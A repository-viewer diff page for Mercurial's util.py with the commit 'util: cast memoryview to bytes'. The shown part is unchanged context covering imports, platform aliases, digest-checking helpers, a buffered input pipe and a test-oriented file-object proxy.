##// END OF EJS Templates
util: cast memoryview to bytes...
Gregory Szorc -
r41429:b141b524 default
parent child Browse files
Show More
@@ -1,4015 +1,4021 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import time
34 import time
35 import traceback
35 import traceback
36 import warnings
36 import warnings
37 import zlib
37 import zlib
38
38
39 from .thirdparty import (
39 from .thirdparty import (
40 attr,
40 attr,
41 )
41 )
42 from hgdemandimport import tracing
42 from hgdemandimport import tracing
43 from . import (
43 from . import (
44 encoding,
44 encoding,
45 error,
45 error,
46 i18n,
46 i18n,
47 node as nodemod,
47 node as nodemod,
48 policy,
48 policy,
49 pycompat,
49 pycompat,
50 urllibcompat,
50 urllibcompat,
51 )
51 )
52 from .utils import (
52 from .utils import (
53 procutil,
53 procutil,
54 stringutil,
54 stringutil,
55 )
55 )
56
56
57 base85 = policy.importmod(r'base85')
57 base85 = policy.importmod(r'base85')
58 osutil = policy.importmod(r'osutil')
58 osutil = policy.importmod(r'osutil')
59 parsers = policy.importmod(r'parsers')
59 parsers = policy.importmod(r'parsers')
60
60
61 b85decode = base85.b85decode
61 b85decode = base85.b85decode
62 b85encode = base85.b85encode
62 b85encode = base85.b85encode
63
63
64 cookielib = pycompat.cookielib
64 cookielib = pycompat.cookielib
65 httplib = pycompat.httplib
65 httplib = pycompat.httplib
66 pickle = pycompat.pickle
66 pickle = pycompat.pickle
67 safehasattr = pycompat.safehasattr
67 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
68 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
69 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
71 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
72 xmlrpclib = pycompat.xmlrpclib
73
73
74 httpserver = urllibcompat.httpserver
74 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
75 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
76 urlreq = urllibcompat.urlreq
77
77
78 # workaround for win32mbcs
78 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
79 _filenamebytestr = pycompat.bytestr
80
80
81 if pycompat.iswindows:
81 if pycompat.iswindows:
82 from . import windows as platform
82 from . import windows as platform
83 else:
83 else:
84 from . import posix as platform
84 from . import posix as platform
85
85
86 _ = i18n._
86 _ = i18n._
87
87
88 bindunixsocket = platform.bindunixsocket
88 bindunixsocket = platform.bindunixsocket
89 cachestat = platform.cachestat
89 cachestat = platform.cachestat
90 checkexec = platform.checkexec
90 checkexec = platform.checkexec
91 checklink = platform.checklink
91 checklink = platform.checklink
92 copymode = platform.copymode
92 copymode = platform.copymode
93 expandglobs = platform.expandglobs
93 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
94 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
95 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
96 groupmembers = platform.groupmembers
97 groupname = platform.groupname
97 groupname = platform.groupname
98 isexec = platform.isexec
98 isexec = platform.isexec
99 isowner = platform.isowner
99 isowner = platform.isowner
100 listdir = osutil.listdir
100 listdir = osutil.listdir
101 localpath = platform.localpath
101 localpath = platform.localpath
102 lookupreg = platform.lookupreg
102 lookupreg = platform.lookupreg
103 makedir = platform.makedir
103 makedir = platform.makedir
104 nlinks = platform.nlinks
104 nlinks = platform.nlinks
105 normpath = platform.normpath
105 normpath = platform.normpath
106 normcase = platform.normcase
106 normcase = platform.normcase
107 normcasespec = platform.normcasespec
107 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
108 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
109 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
110 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
111 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
112 pconvert = platform.pconvert
113 poll = platform.poll
113 poll = platform.poll
114 posixfile = platform.posixfile
114 posixfile = platform.posixfile
115 readlink = platform.readlink
115 readlink = platform.readlink
116 rename = platform.rename
116 rename = platform.rename
117 removedirs = platform.removedirs
117 removedirs = platform.removedirs
118 samedevice = platform.samedevice
118 samedevice = platform.samedevice
119 samefile = platform.samefile
119 samefile = platform.samefile
120 samestat = platform.samestat
120 samestat = platform.samestat
121 setflags = platform.setflags
121 setflags = platform.setflags
122 split = platform.split
122 split = platform.split
123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 statisexec = platform.statisexec
124 statisexec = platform.statisexec
125 statislink = platform.statislink
125 statislink = platform.statislink
126 umask = platform.umask
126 umask = platform.umask
127 unlink = platform.unlink
127 unlink = platform.unlink
128 username = platform.username
128 username = platform.username
129
129
130 try:
130 try:
131 recvfds = osutil.recvfds
131 recvfds = osutil.recvfds
132 except AttributeError:
132 except AttributeError:
133 pass
133 pass
134
134
135 # Python compatibility
135 # Python compatibility
136
136
137 _notset = object()
137 _notset = object()
138
138
139 def bitsfrom(container):
139 def bitsfrom(container):
140 bits = 0
140 bits = 0
141 for bit in container:
141 for bit in container:
142 bits |= bit
142 bits |= bit
143 return bits
143 return bits
144
144
145 # python 2.6 still have deprecation warning enabled by default. We do not want
145 # python 2.6 still have deprecation warning enabled by default. We do not want
146 # to display anything to standard user so detect if we are running test and
146 # to display anything to standard user so detect if we are running test and
147 # only use python deprecation warning in this case.
147 # only use python deprecation warning in this case.
148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 if _dowarn:
149 if _dowarn:
150 # explicitly unfilter our warning for python 2.7
150 # explicitly unfilter our warning for python 2.7
151 #
151 #
152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 if _dowarn and pycompat.ispy3:
159 if _dowarn and pycompat.ispy3:
160 # silence warning emitted by passing user string to re.sub()
160 # silence warning emitted by passing user string to re.sub()
161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 r'mercurial')
162 r'mercurial')
163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 DeprecationWarning, r'mercurial')
164 DeprecationWarning, r'mercurial')
165 # TODO: reinvent imp.is_frozen()
165 # TODO: reinvent imp.is_frozen()
166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 DeprecationWarning, r'mercurial')
167 DeprecationWarning, r'mercurial')
168
168
169 def nouideprecwarn(msg, version, stacklevel=1):
169 def nouideprecwarn(msg, version, stacklevel=1):
170 """Issue an python native deprecation warning
170 """Issue an python native deprecation warning
171
171
172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 """
173 """
174 if _dowarn:
174 if _dowarn:
175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 " update your code.)") % version
176 " update your code.)") % version
177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178
178
179 DIGESTS = {
179 DIGESTS = {
180 'md5': hashlib.md5,
180 'md5': hashlib.md5,
181 'sha1': hashlib.sha1,
181 'sha1': hashlib.sha1,
182 'sha512': hashlib.sha512,
182 'sha512': hashlib.sha512,
183 }
183 }
184 # List of digest types from strongest to weakest
184 # List of digest types from strongest to weakest
185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186
186
187 for k in DIGESTS_BY_STRENGTH:
187 for k in DIGESTS_BY_STRENGTH:
188 assert k in DIGESTS
188 assert k in DIGESTS
189
189
190 class digester(object):
190 class digester(object):
191 """helper to compute digests.
191 """helper to compute digests.
192
192
193 This helper can be used to compute one or more digests given their name.
193 This helper can be used to compute one or more digests given their name.
194
194
195 >>> d = digester([b'md5', b'sha1'])
195 >>> d = digester([b'md5', b'sha1'])
196 >>> d.update(b'foo')
196 >>> d.update(b'foo')
197 >>> [k for k in sorted(d)]
197 >>> [k for k in sorted(d)]
198 ['md5', 'sha1']
198 ['md5', 'sha1']
199 >>> d[b'md5']
199 >>> d[b'md5']
200 'acbd18db4cc2f85cedef654fccc4a4d8'
200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 >>> d[b'sha1']
201 >>> d[b'sha1']
202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 >>> digester.preferred([b'md5', b'sha1'])
203 >>> digester.preferred([b'md5', b'sha1'])
204 'sha1'
204 'sha1'
205 """
205 """
206
206
207 def __init__(self, digests, s=''):
207 def __init__(self, digests, s=''):
208 self._hashes = {}
208 self._hashes = {}
209 for k in digests:
209 for k in digests:
210 if k not in DIGESTS:
210 if k not in DIGESTS:
211 raise error.Abort(_('unknown digest type: %s') % k)
211 raise error.Abort(_('unknown digest type: %s') % k)
212 self._hashes[k] = DIGESTS[k]()
212 self._hashes[k] = DIGESTS[k]()
213 if s:
213 if s:
214 self.update(s)
214 self.update(s)
215
215
216 def update(self, data):
216 def update(self, data):
217 for h in self._hashes.values():
217 for h in self._hashes.values():
218 h.update(data)
218 h.update(data)
219
219
220 def __getitem__(self, key):
220 def __getitem__(self, key):
221 if key not in DIGESTS:
221 if key not in DIGESTS:
222 raise error.Abort(_('unknown digest type: %s') % k)
222 raise error.Abort(_('unknown digest type: %s') % k)
223 return nodemod.hex(self._hashes[key].digest())
223 return nodemod.hex(self._hashes[key].digest())
224
224
225 def __iter__(self):
225 def __iter__(self):
226 return iter(self._hashes)
226 return iter(self._hashes)
227
227
228 @staticmethod
228 @staticmethod
229 def preferred(supported):
229 def preferred(supported):
230 """returns the strongest digest type in both supported and DIGESTS."""
230 """returns the strongest digest type in both supported and DIGESTS."""
231
231
232 for k in DIGESTS_BY_STRENGTH:
232 for k in DIGESTS_BY_STRENGTH:
233 if k in supported:
233 if k in supported:
234 return k
234 return k
235 return None
235 return None
236
236
237 class digestchecker(object):
237 class digestchecker(object):
238 """file handle wrapper that additionally checks content against a given
238 """file handle wrapper that additionally checks content against a given
239 size and digests.
239 size and digests.
240
240
241 d = digestchecker(fh, size, {'md5': '...'})
241 d = digestchecker(fh, size, {'md5': '...'})
242
242
243 When multiple digests are given, all of them are validated.
243 When multiple digests are given, all of them are validated.
244 """
244 """
245
245
246 def __init__(self, fh, size, digests):
246 def __init__(self, fh, size, digests):
247 self._fh = fh
247 self._fh = fh
248 self._size = size
248 self._size = size
249 self._got = 0
249 self._got = 0
250 self._digests = dict(digests)
250 self._digests = dict(digests)
251 self._digester = digester(self._digests.keys())
251 self._digester = digester(self._digests.keys())
252
252
253 def read(self, length=-1):
253 def read(self, length=-1):
254 content = self._fh.read(length)
254 content = self._fh.read(length)
255 self._digester.update(content)
255 self._digester.update(content)
256 self._got += len(content)
256 self._got += len(content)
257 return content
257 return content
258
258
259 def validate(self):
259 def validate(self):
260 if self._size != self._got:
260 if self._size != self._got:
261 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 (self._size, self._got))
262 (self._size, self._got))
263 for k, v in self._digests.items():
263 for k, v in self._digests.items():
264 if v != self._digester[k]:
264 if v != self._digester[k]:
265 # i18n: first parameter is a digest name
265 # i18n: first parameter is a digest name
266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 (k, v, self._digester[k]))
267 (k, v, self._digester[k]))
268
268
269 try:
269 try:
270 buffer = buffer
270 buffer = buffer
271 except NameError:
271 except NameError:
272 def buffer(sliceable, offset=0, length=None):
272 def buffer(sliceable, offset=0, length=None):
273 if length is not None:
273 if length is not None:
274 return memoryview(sliceable)[offset:offset + length]
274 return memoryview(sliceable)[offset:offset + length]
275 return memoryview(sliceable)[offset:]
275 return memoryview(sliceable)[offset:]
276
276
277 _chunksize = 4096
277 _chunksize = 4096
278
278
279 class bufferedinputpipe(object):
279 class bufferedinputpipe(object):
280 """a manually buffered input pipe
280 """a manually buffered input pipe
281
281
282 Python will not let us use buffered IO and lazy reading with 'polling' at
282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 the same time. We cannot probe the buffer state and select will not detect
283 the same time. We cannot probe the buffer state and select will not detect
284 that data are ready to read if they are already buffered.
284 that data are ready to read if they are already buffered.
285
285
286 This class let us work around that by implementing its own buffering
286 This class let us work around that by implementing its own buffering
287 (allowing efficient readline) while offering a way to know if the buffer is
287 (allowing efficient readline) while offering a way to know if the buffer is
288 empty from the output (allowing collaboration of the buffer with polling).
288 empty from the output (allowing collaboration of the buffer with polling).
289
289
290 This class lives in the 'util' module because it makes use of the 'os'
290 This class lives in the 'util' module because it makes use of the 'os'
291 module from the python stdlib.
291 module from the python stdlib.
292 """
292 """
293 def __new__(cls, fh):
293 def __new__(cls, fh):
294 # If we receive a fileobjectproxy, we need to use a variation of this
294 # If we receive a fileobjectproxy, we need to use a variation of this
295 # class that notifies observers about activity.
295 # class that notifies observers about activity.
296 if isinstance(fh, fileobjectproxy):
296 if isinstance(fh, fileobjectproxy):
297 cls = observedbufferedinputpipe
297 cls = observedbufferedinputpipe
298
298
299 return super(bufferedinputpipe, cls).__new__(cls)
299 return super(bufferedinputpipe, cls).__new__(cls)
300
300
301 def __init__(self, input):
301 def __init__(self, input):
302 self._input = input
302 self._input = input
303 self._buffer = []
303 self._buffer = []
304 self._eof = False
304 self._eof = False
305 self._lenbuf = 0
305 self._lenbuf = 0
306
306
307 @property
307 @property
308 def hasbuffer(self):
308 def hasbuffer(self):
309 """True is any data is currently buffered
309 """True is any data is currently buffered
310
310
311 This will be used externally a pre-step for polling IO. If there is
311 This will be used externally a pre-step for polling IO. If there is
312 already data then no polling should be set in place."""
312 already data then no polling should be set in place."""
313 return bool(self._buffer)
313 return bool(self._buffer)
314
314
315 @property
315 @property
316 def closed(self):
316 def closed(self):
317 return self._input.closed
317 return self._input.closed
318
318
319 def fileno(self):
319 def fileno(self):
320 return self._input.fileno()
320 return self._input.fileno()
321
321
322 def close(self):
322 def close(self):
323 return self._input.close()
323 return self._input.close()
324
324
325 def read(self, size):
325 def read(self, size):
326 while (not self._eof) and (self._lenbuf < size):
326 while (not self._eof) and (self._lenbuf < size):
327 self._fillbuffer()
327 self._fillbuffer()
328 return self._frombuffer(size)
328 return self._frombuffer(size)
329
329
330 def unbufferedread(self, size):
330 def unbufferedread(self, size):
331 if not self._eof and self._lenbuf == 0:
331 if not self._eof and self._lenbuf == 0:
332 self._fillbuffer(max(size, _chunksize))
332 self._fillbuffer(max(size, _chunksize))
333 return self._frombuffer(min(self._lenbuf, size))
333 return self._frombuffer(min(self._lenbuf, size))
334
334
335 def readline(self, *args, **kwargs):
335 def readline(self, *args, **kwargs):
336 if len(self._buffer) > 1:
336 if len(self._buffer) > 1:
337 # this should not happen because both read and readline end with a
337 # this should not happen because both read and readline end with a
338 # _frombuffer call that collapse it.
338 # _frombuffer call that collapse it.
339 self._buffer = [''.join(self._buffer)]
339 self._buffer = [''.join(self._buffer)]
340 self._lenbuf = len(self._buffer[0])
340 self._lenbuf = len(self._buffer[0])
341 lfi = -1
341 lfi = -1
342 if self._buffer:
342 if self._buffer:
343 lfi = self._buffer[-1].find('\n')
343 lfi = self._buffer[-1].find('\n')
344 while (not self._eof) and lfi < 0:
344 while (not self._eof) and lfi < 0:
345 self._fillbuffer()
345 self._fillbuffer()
346 if self._buffer:
346 if self._buffer:
347 lfi = self._buffer[-1].find('\n')
347 lfi = self._buffer[-1].find('\n')
348 size = lfi + 1
348 size = lfi + 1
349 if lfi < 0: # end of file
349 if lfi < 0: # end of file
350 size = self._lenbuf
350 size = self._lenbuf
351 elif len(self._buffer) > 1:
351 elif len(self._buffer) > 1:
352 # we need to take previous chunks into account
352 # we need to take previous chunks into account
353 size += self._lenbuf - len(self._buffer[-1])
353 size += self._lenbuf - len(self._buffer[-1])
354 return self._frombuffer(size)
354 return self._frombuffer(size)
355
355
356 def _frombuffer(self, size):
356 def _frombuffer(self, size):
357 """return at most 'size' data from the buffer
357 """return at most 'size' data from the buffer
358
358
359 The data are removed from the buffer."""
359 The data are removed from the buffer."""
360 if size == 0 or not self._buffer:
360 if size == 0 or not self._buffer:
361 return ''
361 return ''
362 buf = self._buffer[0]
362 buf = self._buffer[0]
363 if len(self._buffer) > 1:
363 if len(self._buffer) > 1:
364 buf = ''.join(self._buffer)
364 buf = ''.join(self._buffer)
365
365
366 data = buf[:size]
366 data = buf[:size]
367 buf = buf[len(data):]
367 buf = buf[len(data):]
368 if buf:
368 if buf:
369 self._buffer = [buf]
369 self._buffer = [buf]
370 self._lenbuf = len(buf)
370 self._lenbuf = len(buf)
371 else:
371 else:
372 self._buffer = []
372 self._buffer = []
373 self._lenbuf = 0
373 self._lenbuf = 0
374 return data
374 return data
375
375
376 def _fillbuffer(self, size=_chunksize):
376 def _fillbuffer(self, size=_chunksize):
377 """read data to the buffer"""
377 """read data to the buffer"""
378 data = os.read(self._input.fileno(), size)
378 data = os.read(self._input.fileno(), size)
379 if not data:
379 if not data:
380 self._eof = True
380 self._eof = True
381 else:
381 else:
382 self._lenbuf += len(data)
382 self._lenbuf += len(data)
383 self._buffer.append(data)
383 self._buffer.append(data)
384
384
385 return data
385 return data
386
386
387 def mmapread(fp):
387 def mmapread(fp):
388 try:
388 try:
389 fd = getattr(fp, 'fileno', lambda: fp)()
389 fd = getattr(fp, 'fileno', lambda: fp)()
390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 except ValueError:
391 except ValueError:
392 # Empty files cannot be mmapped, but mmapread should still work. Check
392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 # if the file is empty, and if so, return an empty buffer.
393 # if the file is empty, and if so, return an empty buffer.
394 if os.fstat(fd).st_size == 0:
394 if os.fstat(fd).st_size == 0:
395 return ''
395 return ''
396 raise
396 raise
397
397
398 class fileobjectproxy(object):
398 class fileobjectproxy(object):
399 """A proxy around file objects that tells a watcher when events occur.
399 """A proxy around file objects that tells a watcher when events occur.
400
400
401 This type is intended to only be used for testing purposes. Think hard
401 This type is intended to only be used for testing purposes. Think hard
402 before using it in important code.
402 before using it in important code.
403 """
403 """
404 __slots__ = (
404 __slots__ = (
405 r'_orig',
405 r'_orig',
406 r'_observer',
406 r'_observer',
407 )
407 )
408
408
409 def __init__(self, fh, observer):
409 def __init__(self, fh, observer):
410 object.__setattr__(self, r'_orig', fh)
410 object.__setattr__(self, r'_orig', fh)
411 object.__setattr__(self, r'_observer', observer)
411 object.__setattr__(self, r'_observer', observer)
412
412
413 def __getattribute__(self, name):
413 def __getattribute__(self, name):
414 ours = {
414 ours = {
415 r'_observer',
415 r'_observer',
416
416
417 # IOBase
417 # IOBase
418 r'close',
418 r'close',
419 # closed if a property
419 # closed if a property
420 r'fileno',
420 r'fileno',
421 r'flush',
421 r'flush',
422 r'isatty',
422 r'isatty',
423 r'readable',
423 r'readable',
424 r'readline',
424 r'readline',
425 r'readlines',
425 r'readlines',
426 r'seek',
426 r'seek',
427 r'seekable',
427 r'seekable',
428 r'tell',
428 r'tell',
429 r'truncate',
429 r'truncate',
430 r'writable',
430 r'writable',
431 r'writelines',
431 r'writelines',
432 # RawIOBase
432 # RawIOBase
433 r'read',
433 r'read',
434 r'readall',
434 r'readall',
435 r'readinto',
435 r'readinto',
436 r'write',
436 r'write',
437 # BufferedIOBase
437 # BufferedIOBase
438 # raw is a property
438 # raw is a property
439 r'detach',
439 r'detach',
440 # read defined above
440 # read defined above
441 r'read1',
441 r'read1',
442 # readinto defined above
442 # readinto defined above
443 # write defined above
443 # write defined above
444 }
444 }
445
445
446 # We only observe some methods.
446 # We only observe some methods.
447 if name in ours:
447 if name in ours:
448 return object.__getattribute__(self, name)
448 return object.__getattribute__(self, name)
449
449
450 return getattr(object.__getattribute__(self, r'_orig'), name)
450 return getattr(object.__getattribute__(self, r'_orig'), name)
451
451
452 def __nonzero__(self):
452 def __nonzero__(self):
453 return bool(object.__getattribute__(self, r'_orig'))
453 return bool(object.__getattribute__(self, r'_orig'))
454
454
455 __bool__ = __nonzero__
455 __bool__ = __nonzero__
456
456
457 def __delattr__(self, name):
457 def __delattr__(self, name):
458 return delattr(object.__getattribute__(self, r'_orig'), name)
458 return delattr(object.__getattribute__(self, r'_orig'), name)
459
459
460 def __setattr__(self, name, value):
460 def __setattr__(self, name, value):
461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462
462
463 def __iter__(self):
463 def __iter__(self):
464 return object.__getattribute__(self, r'_orig').__iter__()
464 return object.__getattribute__(self, r'_orig').__iter__()
465
465
466 def _observedcall(self, name, *args, **kwargs):
466 def _observedcall(self, name, *args, **kwargs):
467 # Call the original object.
467 # Call the original object.
468 orig = object.__getattribute__(self, r'_orig')
468 orig = object.__getattribute__(self, r'_orig')
469 res = getattr(orig, name)(*args, **kwargs)
469 res = getattr(orig, name)(*args, **kwargs)
470
470
471 # Call a method on the observer of the same name with arguments
471 # Call a method on the observer of the same name with arguments
472 # so it can react, log, etc.
472 # so it can react, log, etc.
473 observer = object.__getattribute__(self, r'_observer')
473 observer = object.__getattribute__(self, r'_observer')
474 fn = getattr(observer, name, None)
474 fn = getattr(observer, name, None)
475 if fn:
475 if fn:
476 fn(res, *args, **kwargs)
476 fn(res, *args, **kwargs)
477
477
478 return res
478 return res
479
479
480 def close(self, *args, **kwargs):
480 def close(self, *args, **kwargs):
481 return object.__getattribute__(self, r'_observedcall')(
481 return object.__getattribute__(self, r'_observedcall')(
482 r'close', *args, **kwargs)
482 r'close', *args, **kwargs)
483
483
484 def fileno(self, *args, **kwargs):
484 def fileno(self, *args, **kwargs):
485 return object.__getattribute__(self, r'_observedcall')(
485 return object.__getattribute__(self, r'_observedcall')(
486 r'fileno', *args, **kwargs)
486 r'fileno', *args, **kwargs)
487
487
488 def flush(self, *args, **kwargs):
488 def flush(self, *args, **kwargs):
489 return object.__getattribute__(self, r'_observedcall')(
489 return object.__getattribute__(self, r'_observedcall')(
490 r'flush', *args, **kwargs)
490 r'flush', *args, **kwargs)
491
491
492 def isatty(self, *args, **kwargs):
492 def isatty(self, *args, **kwargs):
493 return object.__getattribute__(self, r'_observedcall')(
493 return object.__getattribute__(self, r'_observedcall')(
494 r'isatty', *args, **kwargs)
494 r'isatty', *args, **kwargs)
495
495
496 def readable(self, *args, **kwargs):
496 def readable(self, *args, **kwargs):
497 return object.__getattribute__(self, r'_observedcall')(
497 return object.__getattribute__(self, r'_observedcall')(
498 r'readable', *args, **kwargs)
498 r'readable', *args, **kwargs)
499
499
500 def readline(self, *args, **kwargs):
500 def readline(self, *args, **kwargs):
501 return object.__getattribute__(self, r'_observedcall')(
501 return object.__getattribute__(self, r'_observedcall')(
502 r'readline', *args, **kwargs)
502 r'readline', *args, **kwargs)
503
503
504 def readlines(self, *args, **kwargs):
504 def readlines(self, *args, **kwargs):
505 return object.__getattribute__(self, r'_observedcall')(
505 return object.__getattribute__(self, r'_observedcall')(
506 r'readlines', *args, **kwargs)
506 r'readlines', *args, **kwargs)
507
507
508 def seek(self, *args, **kwargs):
508 def seek(self, *args, **kwargs):
509 return object.__getattribute__(self, r'_observedcall')(
509 return object.__getattribute__(self, r'_observedcall')(
510 r'seek', *args, **kwargs)
510 r'seek', *args, **kwargs)
511
511
512 def seekable(self, *args, **kwargs):
512 def seekable(self, *args, **kwargs):
513 return object.__getattribute__(self, r'_observedcall')(
513 return object.__getattribute__(self, r'_observedcall')(
514 r'seekable', *args, **kwargs)
514 r'seekable', *args, **kwargs)
515
515
516 def tell(self, *args, **kwargs):
516 def tell(self, *args, **kwargs):
517 return object.__getattribute__(self, r'_observedcall')(
517 return object.__getattribute__(self, r'_observedcall')(
518 r'tell', *args, **kwargs)
518 r'tell', *args, **kwargs)
519
519
520 def truncate(self, *args, **kwargs):
520 def truncate(self, *args, **kwargs):
521 return object.__getattribute__(self, r'_observedcall')(
521 return object.__getattribute__(self, r'_observedcall')(
522 r'truncate', *args, **kwargs)
522 r'truncate', *args, **kwargs)
523
523
524 def writable(self, *args, **kwargs):
524 def writable(self, *args, **kwargs):
525 return object.__getattribute__(self, r'_observedcall')(
525 return object.__getattribute__(self, r'_observedcall')(
526 r'writable', *args, **kwargs)
526 r'writable', *args, **kwargs)
527
527
528 def writelines(self, *args, **kwargs):
528 def writelines(self, *args, **kwargs):
529 return object.__getattribute__(self, r'_observedcall')(
529 return object.__getattribute__(self, r'_observedcall')(
530 r'writelines', *args, **kwargs)
530 r'writelines', *args, **kwargs)
531
531
532 def read(self, *args, **kwargs):
532 def read(self, *args, **kwargs):
533 return object.__getattribute__(self, r'_observedcall')(
533 return object.__getattribute__(self, r'_observedcall')(
534 r'read', *args, **kwargs)
534 r'read', *args, **kwargs)
535
535
536 def readall(self, *args, **kwargs):
536 def readall(self, *args, **kwargs):
537 return object.__getattribute__(self, r'_observedcall')(
537 return object.__getattribute__(self, r'_observedcall')(
538 r'readall', *args, **kwargs)
538 r'readall', *args, **kwargs)
539
539
540 def readinto(self, *args, **kwargs):
540 def readinto(self, *args, **kwargs):
541 return object.__getattribute__(self, r'_observedcall')(
541 return object.__getattribute__(self, r'_observedcall')(
542 r'readinto', *args, **kwargs)
542 r'readinto', *args, **kwargs)
543
543
544 def write(self, *args, **kwargs):
544 def write(self, *args, **kwargs):
545 return object.__getattribute__(self, r'_observedcall')(
545 return object.__getattribute__(self, r'_observedcall')(
546 r'write', *args, **kwargs)
546 r'write', *args, **kwargs)
547
547
548 def detach(self, *args, **kwargs):
548 def detach(self, *args, **kwargs):
549 return object.__getattribute__(self, r'_observedcall')(
549 return object.__getattribute__(self, r'_observedcall')(
550 r'detach', *args, **kwargs)
550 r'detach', *args, **kwargs)
551
551
552 def read1(self, *args, **kwargs):
552 def read1(self, *args, **kwargs):
553 return object.__getattribute__(self, r'_observedcall')(
553 return object.__getattribute__(self, r'_observedcall')(
554 r'read1', *args, **kwargs)
554 r'read1', *args, **kwargs)
555
555
556 class observedbufferedinputpipe(bufferedinputpipe):
556 class observedbufferedinputpipe(bufferedinputpipe):
557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558
558
559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 bypass ``fileobjectproxy``. Because of this, we need to make
560 bypass ``fileobjectproxy``. Because of this, we need to make
561 ``bufferedinputpipe`` aware of these operations.
561 ``bufferedinputpipe`` aware of these operations.
562
562
563 This variation of ``bufferedinputpipe`` can notify observers about
563 This variation of ``bufferedinputpipe`` can notify observers about
564 ``os.read()`` events. It also re-publishes other events, such as
564 ``os.read()`` events. It also re-publishes other events, such as
565 ``read()`` and ``readline()``.
